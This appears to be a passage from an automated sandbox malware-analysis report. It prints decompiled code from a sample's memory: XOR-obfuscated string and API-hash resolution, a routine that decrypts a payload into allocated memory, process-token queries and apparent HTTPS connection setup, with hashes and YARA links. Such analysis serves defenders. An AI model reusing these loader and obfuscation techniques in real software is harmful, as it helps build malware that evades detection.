					_t144 = _t122 + 0x00000020 & 0x000000ff;
					_t159 = _t159 + 1;
					_t113 = _t122 & 0x000000ff;
					_t122 =  *_t159;
					_t145 =  >=  ? _t113 : _t144;
					_t114 =  >=  ? _t113 : _t144;
					_t164 = _t164 * 0x00000101 + ( >=  ? _t113 : _t144) ^ ( >=  ? _t113 : _t144) << 0x00000010;
				}
				_t81 = E736D6620(_t164, _t149);
				if(_t81 == 0) {
					_v36 = _t81;
					_v32 = 0x70194975;
					_v28 = 0x661a4f75;
					_v24 = 0x55015458;
					_v20 = 0x14782639;
					if(_v36 == 0) {
						_t143 = 0;
						asm("o16 nop [eax+eax]");
						do {
							 *(_t176 + _t143 * 4 - 0x1c) =  *(_t176 + _t143 * 4 - 0x1c) ^ 0x14782639;
							_t143 = _t143 + 1;
						} while (_t143 < 4);
					}
					_t123 = _v32;
					_t165 =  &_v32;
					_t150 = 0;
					while(_t123 != 0) {
						_t23 = _t123 + 0x20; // 0x70194995
						_t165 = _t165 + 1;
						_t107 = _t123 & 0x000000ff;
						_t123 =  *_t165;
						_t142 =  >=  ? _t107 : _t23 & 0x000000ff;
						_t108 =  >=  ? _t107 : _t23 & 0x000000ff;
						_t150 = _t150 * 0x00000101 + ( >=  ? _t107 : _t23 & 0x000000ff) ^ ( >=  ? _t107 : _t23 & 0x000000ff) << 0x00000010;
					}
					_v56 = 0;
					_v52 = 0x59507a43;
					_v48 = 0x2531734d;
					_v44 = 0x5b4e7b26;
					_v40 = 0x17023f08;
					if(_v56 == 0) {
						_t140 = 0;
						do {
							 *(_t176 + _t140 * 4 - 0x30) =  *(_t176 + _t140 * 4 - 0x30) ^ 0x17023f08;
							_t140 = _t140 + 1;
						} while (_t140 < 4);
					}
					_t124 = _v52;
					_t161 =  &_v52;
					_t166 = 0;
					while(_t124 != 0) {
						_t40 = _t124 + 0x20; // 0x59507a63
						_t161 = _t161 + 1;
						_t101 = _t124 & 0x000000ff;
						_t124 =  *_t161;
						_t139 =  >=  ? _t101 : _t40 & 0x000000ff;
						_t102 =  >=  ? _t101 : _t40 & 0x000000ff;
						_t166 = _t166 * 0x00000101 + ( >=  ? _t101 : _t40 & 0x000000ff) ^ ( >=  ? _t101 : _t40 & 0x000000ff) << 0x00000010;
					}
					_t84 = E736D6620(_t166, _t150);
					_v76 = 0;
					_v72 = 0x511f4216;
					_v68 = 0x40084823;
					_v64 = 0x64194335;
					_v60 = 0x16b5422;
					_v12 = _t84;
					if(_v76 == 0) {
						_t137 = 0;
						do {
							 *(_t176 + _t137 * 4 - 0x44) =  *(_t176 + _t137 * 4 - 0x44) ^ 0x016b2751;
							_t137 = _t137 + 1;
						} while (_t137 < 4);
					}
					_t125 = _v72;
					_t167 =  &_v72;
					_t151 = 0;
					while(_t125 != 0) {
						_t58 = _t125 + 0x20; // 0x511f4236
						_t167 = _t167 + 1;
						_t95 = _t125 & 0x000000ff;
						_t125 =  *_t167;
						_t136 =  >=  ? _t95 : _t58 & 0x000000ff;
						_t96 =  >=  ? _t95 : _t58 & 0x000000ff;
						_t151 = _t151 * 0x00000101 + ( >=  ? _t95 : _t58 & 0x000000ff) ^ ( >=  ? _t95 : _t58 & 0x000000ff) << 0x00000010;
					}
					_v96 = 0;
					_v92 = 0x12472d7b;
					_v88 = 0x6e262475;
					_v84 = 0x10592c1e;
					_v80 = 0x5c156830;
					if(_v96 == 0) {
						_t134 = 0;
						do {
							 *(_t176 + _t134 * 4 - 0x58) =  *(_t176 + _t134 * 4 - 0x58) ^ 0x5c156830;
							_t134 = _t134 + 1;
						} while (_t134 < 4);
					}
					_t126 = _v92;
					_t162 =  &_v92;
					_t168 = 0;
					while(_t126 != 0) {
						_t75 = _t126 + 0x20; // 0x12472d9b
						_t162 = _t162 + 1;
						_t89 = _t126 & 0x000000ff;
						_t126 =  *_t162;
						_t133 =  >=  ? _t89 : _t75 & 0x000000ff;
						_t90 =  >=  ? _t89 : _t75 & 0x000000ff;
						_t168 = _t168 * 0x00000101 + ( >=  ? _t89 : _t75 & 0x000000ff) ^ ( >=  ? _t89 : _t75 & 0x000000ff) << 0x00000010;
					}
					_t86 = E736D6620(_t168, _t151);
					_t87 = LoadLibraryA(_v8);
					_t81 =  *_t86(_t87, _v16);
				}
				return _t81;
			}






























































                                                                                                                                                                                                                                0x736d6769
                                                                                                                                                                                                                                0x736d676c
                                                                                                                                                                                                                                0x736d676f
                                                                                                                                                                                                                                0x736d6771
                                                                                                                                                                                                                                0x736d6773
                                                                                                                                                                                                                                0x736d6776
                                                                                                                                                                                                                                0x736d677b
                                                                                                                                                                                                                                0x736d6780
                                                                                                                                                                                                                                0x736d6786
                                                                                                                                                                                                                                0x736d6789
                                                                                                                                                                                                                                0x736d678c
                                                                                                                                                                                                                                0x736d678f
                                                                                                                                                                                                                                0x736d6791
                                                                                                                                                                                                                                0x736d679a
                                                                                                                                                                                                                                0x736d67a2
                                                                                                                                                                                                                                0x736d67a4
                                                                                                                                                                                                                                0x736d67a8
                                                                                                                                                                                                                                0x736d67a8
                                                                                                                                                                                                                                0x736d67ab
                                                                                                                                                                                                                                0x736d67ad
                                                                                                                                                                                                                                0x736d67af
                                                                                                                                                                                                                                0x736d67b3
                                                                                                                                                                                                                                0x736d67bb
                                                                                                                                                                                                                                0x736d67be
                                                                                                                                                                                                                                0x736d67c1
                                                                                                                                                                                                                                0x736d67c4
                                                                                                                                                                                                                                0x736d67c6
                                                                                                                                                                                                                                0x736d67cf
                                                                                                                                                                                                                                0x736d67d7
                                                                                                                                                                                                                                0x736d67d9
                                                                                                                                                                                                                                0x736d67df
                                                                                                                                                                                                                                0x736d67e6
                                                                                                                                                                                                                                0x736d67ec
                                                                                                                                                                                                                                0x736d67ef
                                                                                                                                                                                                                                0x736d67f6
                                                                                                                                                                                                                                0x736d67fd
                                                                                                                                                                                                                                0x736d6804
                                                                                                                                                                                                                                0x736d6812
                                                                                                                                                                                                                                0x736d6814
                                                                                                                                                                                                                                0x736d6816
                                                                                                                                                                                                                                0x736d6820
                                                                                                                                                                                                                                0x736d6829
                                                                                                                                                                                                                                0x736d682d
                                                                                                                                                                                                                                0x736d682e
                                                                                                                                                                                                                                0x736d6820
                                                                                                                                                                                                                                0x736d6833
                                                                                                                                                                                                                                0x736d6836
                                                                                                                                                                                                                                0x736d6839
                                                                                                                                                                                                                                0x736d683d
                                                                                                                                                                                                                                0x736d6840
                                                                                                                                                                                                                                0x736d6849
                                                                                                                                                                                                                                0x736d684c
                                                                                                                                                                                                                                0x736d684f
                                                                                                                                                                                                                                0x736d6851
                                                                                                                                                                                                                                0x736d685a
                                                                                                                                                                                                                                0x736d6862
                                                                                                                                                                                                                                0x736d6864
                                                                                                                                                                                                                                0x736d6868
                                                                                                                                                                                                                                0x736d686c
                                                                                                                                                                                                                                0x736d6873
                                                                                                                                                                                                                                0x736d687a
                                                                                                                                                                                                                                0x736d6881
                                                                                                                                                                                                                                0x736d688f
                                                                                                                                                                                                                                0x736d6891
                                                                                                                                                                                                                                0x736d6893
                                                                                                                                                                                                                                0x736d689c
                                                                                                                                                                                                                                0x736d68a0
                                                                                                                                                                                                                                0x736d68a1
                                                                                                                                                                                                                                0x736d6893
                                                                                                                                                                                                                                0x736d68a6
                                                                                                                                                                                                                                0x736d68a9
                                                                                                                                                                                                                                0x736d68ac
                                                                                                                                                                                                                                0x736d68b0
                                                                                                                                                                                                                                0x736d68b2
                                                                                                                                                                                                                                0x736d68bb
                                                                                                                                                                                                                                0x736d68be
                                                                                                                                                                                                                                0x736d68c1
                                                                                                                                                                                                                                0x736d68c3
                                                                                                                                                                                                                                0x736d68cc
                                                                                                                                                                                                                                0x736d68d4
                                                                                                                                                                                                                                0x736d68d6
                                                                                                                                                                                                                                0x736d68dc
                                                                                                                                                                                                                                0x736d68e1
                                                                                                                                                                                                                                0x736d68e5
                                                                                                                                                                                                                                0x736d68ec
                                                                                                                                                                                                                                0x736d68f3
                                                                                                                                                                                                                                0x736d68fa
                                                                                                                                                                                                                                0x736d6908
                                                                                                                                                                                                                                0x736d690b
                                                                                                                                                                                                                                0x736d690d
                                                                                                                                                                                                                                0x736d6910
                                                                                                                                                                                                                                0x736d6919
                                                                                                                                                                                                                                0x736d691d
                                                                                                                                                                                                                                0x736d691e
                                                                                                                                                                                                                                0x736d6910
                                                                                                                                                                                                                                0x736d6923
                                                                                                                                                                                                                                0x736d6926
                                                                                                                                                                                                                                0x736d6929
                                                                                                                                                                                                                                0x736d692d
                                                                                                                                                                                                                                0x736d6930
                                                                                                                                                                                                                                0x736d6939
                                                                                                                                                                                                                                0x736d693c
                                                                                                                                                                                                                                0x736d693f
                                                                                                                                                                                                                                0x736d6941
                                                                                                                                                                                                                                0x736d694a
                                                                                                                                                                                                                                0x736d6952
                                                                                                                                                                                                                                0x736d6954
                                                                                                                                                                                                                                0x736d6958
                                                                                                                                                                                                                                0x736d695c
                                                                                                                                                                                                                                0x736d6963
                                                                                                                                                                                                                                0x736d696a
                                                                                                                                                                                                                                0x736d6971
                                                                                                                                                                                                                                0x736d697f
                                                                                                                                                                                                                                0x736d6981
                                                                                                                                                                                                                                0x736d6983
                                                                                                                                                                                                                                0x736d698c
                                                                                                                                                                                                                                0x736d6990
                                                                                                                                                                                                                                0x736d6991
                                                                                                                                                                                                                                0x736d6983
                                                                                                                                                                                                                                0x736d6996
                                                                                                                                                                                                                                0x736d6999
                                                                                                                                                                                                                                0x736d699c
                                                                                                                                                                                                                                0x736d69a0
                                                                                                                                                                                                                                0x736d69a2
                                                                                                                                                                                                                                0x736d69ab
                                                                                                                                                                                                                                0x736d69ae
                                                                                                                                                                                                                                0x736d69b1
                                                                                                                                                                                                                                0x736d69b3
                                                                                                                                                                                                                                0x736d69bc
                                                                                                                                                                                                                                0x736d69c4
                                                                                                                                                                                                                                0x736d69c6
                                                                                                                                                                                                                                0x736d69cc
                                                                                                                                                                                                                                0x736d69d6
                                                                                                                                                                                                                                0x736d69dd
                                                                                                                                                                                                                                0x736d69dd
                                                                                                                                                                                                                                0x736d69e5

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryA.KERNELBASE(?,0000000F,KERNEL32.dll), ref: 736D69D6
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: LibraryLoad
                                                                                                                                                                                                                                • String ID: &{N[$CzPY$KERNEL32.dll$Ms1%$a$a$u$&n
                                                                                                                                                                                                                                • API String ID: 1029625771-3591805379
                                                                                                                                                                                                                                • Opcode ID: b4c7fb449496acf1fc91a0ec6e0841375ee90e968ec1af219f794c9a184cc063
                                                                                                                                                                                                                                • Instruction ID: a22a1960ca3932b13ce890df88276a97bf0b5913f97f0ee7a361902037fdca68
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b4c7fb449496acf1fc91a0ec6e0841375ee90e968ec1af219f794c9a184cc063
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E81F631E515A98BEF04CFB491603EDBFF6AF49340F990129D8C2AF2C5D77599468B80
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D61F0, Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 193memoryencryptionCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(0000000E,0000AA01,00003000,00000004), ref: 736D6265
                                                                                                                                                                                                                                • CryptImportKey.ADVAPI32(?,00000208,0000002C,00000000,00000001,?), ref: 736D639B
                                                                                                                                                                                                                                • CryptDecrypt.ADVAPI32(?,00000000,00000001,00000000,00000000,0000AA00), ref: 736D63BD
                                                                                                                                                                                                                                • VirtualAlloc.KERNELBASE(00000000,0000AA00,00003000,00000004), ref: 736D63D2
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.881806903.00000000736D1000.00000020.00020000.sdmp, Offset: 736D0000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881795175.00000000736D0000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881848427.00000000736E1000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881893420.00000000736EB000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881920450.00000000736EC000.00000008.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881939812.00000000736EF000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.881959227.00000000736F2000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AllocCryptVirtual$DecryptImport
                                                                                                                                                                                                                                • String ID: $KERNEL32.dll
                                                                                                                                                                                                                                • API String ID: 4282381441-467793799
                                                                                                                                                                                                                                • Opcode ID: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
                                                                                                                                                                                                                                • Instruction ID: f0fa7c921dd1f86e776c8aa6a29a920ccb5ffd890efd8f7f25b12171d1663752
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9a6b8925297998a43b4e4889ef56a4b9ac77028094b6dfea98cd446c2ca662fa
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CE81D231E043588FDB01CFA8CA44BADBBB5FB59304F24829DD948AB286DB719945CB50
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A86307, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 38%
                                                                                                                                                                                                                                			E00A86307(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E00A85157(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E00A853BB(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}



















                                                                                                                                                                                                                                0x00a86314
                                                                                                                                                                                                                                0x00a86315
                                                                                                                                                                                                                                0x00a86316
                                                                                                                                                                                                                                0x00a86317
                                                                                                                                                                                                                                0x00a86318
                                                                                                                                                                                                                                0x00a8631c
                                                                                                                                                                                                                                0x00a86323
                                                                                                                                                                                                                                0x00a86332
                                                                                                                                                                                                                                0x00a86335
                                                                                                                                                                                                                                0x00a86338
                                                                                                                                                                                                                                0x00a8633f
                                                                                                                                                                                                                                0x00a86342
                                                                                                                                                                                                                                0x00a86345
                                                                                                                                                                                                                                0x00a86348
                                                                                                                                                                                                                                0x00a8634b
                                                                                                                                                                                                                                0x00a86356
                                                                                                                                                                                                                                0x00a86358
                                                                                                                                                                                                                                0x00a86361
                                                                                                                                                                                                                                0x00a86369
                                                                                                                                                                                                                                0x00a8636b
                                                                                                                                                                                                                                0x00a8637d
                                                                                                                                                                                                                                0x00a86387
                                                                                                                                                                                                                                0x00a8638b
                                                                                                                                                                                                                                0x00a8639a
                                                                                                                                                                                                                                0x00a8639e
                                                                                                                                                                                                                                0x00a863a7
                                                                                                                                                                                                                                0x00a863af
                                                                                                                                                                                                                                0x00a863af
                                                                                                                                                                                                                                0x00a863b1
                                                                                                                                                                                                                                0x00a863b1
                                                                                                                                                                                                                                0x00a863b9
                                                                                                                                                                                                                                0x00a863bf
                                                                                                                                                                                                                                0x00a863c3
                                                                                                                                                                                                                                0x00a863c3
                                                                                                                                                                                                                                0x00a863ce

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 00A8634E
                                                                                                                                                                                                                                • NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 00A86361
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A8637D
                                                                                                                                                                                                                                  • Part of subcall function 00A85157: RtlAllocateHeap.NTDLL(00000000,00000000,00A81259), ref: 00A85163
                                                                                                                                                                                                                                • NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 00A8639A
                                                                                                                                                                                                                                • memcpy.NTDLL(00000000,00000000,0000001C), ref: 00A863A7
                                                                                                                                                                                                                                • NtClose.NTDLL(?), ref: 00A863B9
                                                                                                                                                                                                                                • NtClose.NTDLL(00000000), ref: 00A863C3
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2575439697-0
                                                                                                                                                                                                                                • Opcode ID: 839d67cf58677a7bf76b97b4f69ce71d4fd09ca2530828599957b39a6116458d
                                                                                                                                                                                                                                • Instruction ID: 1a6623679a89dd777e5276e327cb1a2ece79f5ae1cf3af3d781285b8996af83d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 839d67cf58677a7bf76b97b4f69ce71d4fd09ca2530828599957b39a6116458d
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1F211672900218BBEB01EFA4CD89EDEBFBDEF08750F104126F901EA121D7719A459FA0
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 00A87648, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 124COMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                C-Code - Quality: 23%
                                                                                                                                                                                                                                			E00A87648(void* __ecx, intOrPtr* __esi, void* __eflags, signed int _a4, char _a8) {
				intOrPtr _v8;
				char _v12;
				void* _t34;
				long _t36;
				unsigned int _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t40;
				intOrPtr _t42;
				intOrPtr _t43;
				intOrPtr _t45;
				void* _t56;
				intOrPtr _t57;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t69;

				_t66 = __esi;
				_t63 = E00A83037(_t34, _a4);
				if(_t63 == 0) {
					L18:
					_t36 = GetLastError();
				} else {
					_t37 = GetVersion();
					_t69 = _t37 - 6;
					if(_t69 > 0) {
						L5:
						_a4 = 4;
					} else {
						if(_t69 != 0) {
							L4:
							_a4 = 0;
						} else {
							_t37 = _t37 >> 8;
							if(_t37 > 2) {
								goto L5;
							} else {
								goto L4;
							}
						}
					}
					__imp__(_t63, _a4, 0, 0, 0); // executed
					 *(_t66 + 0x10) = _t37;
					_t38 = E00A853BB(_t63);
					if( *(_t66 + 0x10) == 0) {
						goto L18;
					} else {
						_t39 = E00A83037(_t38,  *_t66);
						_v8 = _t39;
						if(_t39 == 0) {
							goto L18;
						} else {
							_t65 = __imp__; // 0x7021f5a0
							if(_a8 == 0) {
								L10:
								__imp__( *(_t66 + 0x10), _v8, 0x1bb, 0);
								 *((intOrPtr*)(_t66 + 0x14)) = _t39;
								_t40 = E00A853BB(_v8);
								if( *((intOrPtr*)(_t66 + 0x14)) == 0) {
									goto L18;
								} else {
									_a4 = 0x800100;
									_t56 = E00A83037(_t40,  *((intOrPtr*)(_t66 + 4)));
									if(_t56 == 0) {
										goto L18;
									} else {
										_t42 =  *0xa8d2e0; // 0x105a5a8
										_t19 = _t42 + 0xa8e758; // 0x450047
										_t43 = _t19;
										__imp__( *((intOrPtr*)(_t66 + 0x14)), _t43, _t56, 0, 0, 0, _a4); // executed
										 *((intOrPtr*)(_t66 + 0x18)) = _t43;
										E00A853BB(_t56);
										_t45 =  *((intOrPtr*)(_t66 + 0x18));
										if(_t45 == 0) {
											goto L18;
										} else {
											_t57 = 4;
											_v12 = _t57;
											__imp__(_t45, 0x1f,  &_a4,  &_v12);
											if(_t45 != 0) {
												_a4 = _a4 | 0x00000100;
												 *_t65( *((intOrPtr*)(_t66 + 0x18)), 0x1f,  &_a4, _t57);
											}
											_push(_t57);
											_push( &_a8);
											_push(6);
											_push( *((intOrPtr*)(_t66 + 0x18)));
											if( *_t65() == 0) {
												goto L18;
											} else {
												_push(_t57);
												_push( &_a8);
												_push(5);
												_push( *((intOrPtr*)(_t66 + 0x18)));
												if( *_t65() == 0) {
													goto L18;
												} else {
													_t36 = 0;
												}
											}
										}
									}
								}
							} else {
								_t39 =  *_t65( *(_t66 + 0x10), 3,  &_a8, 4);
								if(_t39 == 0) {
									goto L18;
								} else {
									goto L10;
								}
							}
						}
					}
				}
				return _t36;
			}




















                                                                                                                                                                                                                                0x00a87648
                                                                                                                                                                                                                                0x00a87657
                                                                                                                                                                                                                                0x00a8765d
                                                                                                                                                                                                                                0x00a8778e
                                                                                                                                                                                                                                0x00a8778e
                                                                                                                                                                                                                                0x00a87663
                                                                                                                                                                                                                                0x00a87663
                                                                                                                                                                                                                                0x00a87669
                                                                                                                                                                                                                                0x00a8766b
                                                                                                                                                                                                                                0x00a8767b
                                                                                                                                                                                                                                0x00a8767b
                                                                                                                                                                                                                                0x00a8766d
                                                                                                                                                                                                                                0x00a8766d
                                                                                                                                                                                                                                0x00a87676
                                                                                                                                                                                                                                0x00a87676
                                                                                                                                                                                                                                0x00a8766f
                                                                                                                                                                                                                                0x00a8766f
                                                                                                                                                                                                                                0x00a87674
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a87674
                                                                                                                                                                                                                                0x00a8766d
                                                                                                                                                                                                                                0x00a87689
                                                                                                                                                                                                                                0x00a87690
                                                                                                                                                                                                                                0x00a87693
                                                                                                                                                                                                                                0x00a8769b
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a876a1
                                                                                                                                                                                                                                0x00a876a3
                                                                                                                                                                                                                                0x00a876a8
                                                                                                                                                                                                                                0x00a876ad
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a876b3
                                                                                                                                                                                                                                0x00a876b3
                                                                                                                                                                                                                                0x00a876bc
                                                                                                                                                                                                                                0x00a876d3
                                                                                                                                                                                                                                0x00a876df
                                                                                                                                                                                                                                0x00a876e8
                                                                                                                                                                                                                                0x00a876eb
                                                                                                                                                                                                                                0x00a876f3
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a876f9
                                                                                                                                                                                                                                0x00a876fc
                                                                                                                                                                                                                                0x00a87708
                                                                                                                                                                                                                                0x00a8770e
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a87710
                                                                                                                                                                                                                                0x00a87713
                                                                                                                                                                                                                                0x00a8771c
                                                                                                                                                                                                                                0x00a8771c
                                                                                                                                                                                                                                0x00a87726
                                                                                                                                                                                                                                0x00a8772d
                                                                                                                                                                                                                                0x00a87730
                                                                                                                                                                                                                                0x00a87735
                                                                                                                                                                                                                                0x00a8773a
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8773c
                                                                                                                                                                                                                                0x00a8773e
                                                                                                                                                                                                                                0x00a8774a
                                                                                                                                                                                                                                0x00a8774d
                                                                                                                                                                                                                                0x00a87755
                                                                                                                                                                                                                                0x00a87757
                                                                                                                                                                                                                                0x00a87768
                                                                                                                                                                                                                                0x00a87768
                                                                                                                                                                                                                                0x00a8776a
                                                                                                                                                                                                                                0x00a8776e
                                                                                                                                                                                                                                0x00a8776f
                                                                                                                                                                                                                                0x00a87771
                                                                                                                                                                                                                                0x00a87778
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8777a
                                                                                                                                                                                                                                0x00a8777a
                                                                                                                                                                                                                                0x00a8777e
                                                                                                                                                                                                                                0x00a8777f
                                                                                                                                                                                                                                0x00a87781
                                                                                                                                                                                                                                0x00a87788
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a8778a
                                                                                                                                                                                                                                0x00a8778a
                                                                                                                                                                                                                                0x00a8778a
                                                                                                                                                                                                                                0x00a87788
                                                                                                                                                                                                                                0x00a87778
                                                                                                                                                                                                                                0x00a8773a
                                                                                                                                                                                                                                0x00a8770e
                                                                                                                                                                                                                                0x00a876be
                                                                                                                                                                                                                                0x00a876c9
                                                                                                                                                                                                                                0x00a876cd
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                                                0x00a876cd
                                                                                                                                                                                                                                0x00a876bc
                                                                                                                                                                                                                                0x00a876ad
                                                                                                                                                                                                                                0x00a8769b
                                                                                                                                                                                                                                0x00a87797

                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: lstrlen.KERNEL32(?,00000000,01AE9BB8,00000000,00A86F37,01AE9D96,?,?,?,?,?,69B25F44,00000005,00A8D00C), ref: 00A8303E
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: mbstowcs.NTDLL ref: 00A83067
                                                                                                                                                                                                                                  • Part of subcall function 00A83037: memset.NTDLL ref: 00A83079
                                                                                                                                                                                                                                • GetVersion.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A82E91,00000000,00000000,01AE9618,?,?,00A821A4,?,01AE9618,0000EA60), ref: 00A87663
                                                                                                                                                                                                                                • GetLastError.KERNEL32(00000000,0000EA60,00000008,?,?,?,00A82E91,00000000,00000000,01AE9618,?,?,00A821A4,?,01AE9618,0000EA60), ref: 00A8778E
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.880012281.0000000000A81000.00000020.00020000.sdmp, Offset: 00A80000, based on PE: true
                                                                                                                                                                                                                                • Associated: 00000000.00000002.879981916.0000000000A80000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880091411.0000000000A8C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880155004.0000000000A8D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                • Associated: 00000000.00000002.880192564.0000000000A8F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: ErrorLastVersionlstrlenmbstowcsmemset
                                                                                                                                                                                                                                • String ID: @MxtNxt
                                                                                                                                                                                                                                • API String ID: 4097109750-1701360479
                                                                                                                                                                                                                                • Opcode ID: 6f8cbcf53ba2a5eb75d18d9d30ddecb643743c3dd8b13354b578fbc28a0280f9
                                                                                                                                                                                                                                • Instruction ID: 42391356ae5c7c20add91bc738206c64750e4a9fb2fd6e2d9d2bdc2738221fab
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f8cbcf53ba2a5eb75d18d9d30ddecb643743c3dd8b13354b578fbc28a0280f9
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8B41B172500209FFEB20AFA4CD85EAE7BBDEB04784F204529F642950A1E7B1DA45CB60
                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                Function 736D6AD0, Relevance: 3.3, APIs: 1, Strings: 1, Instructions: 342memoryCOMMON
                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                APIs
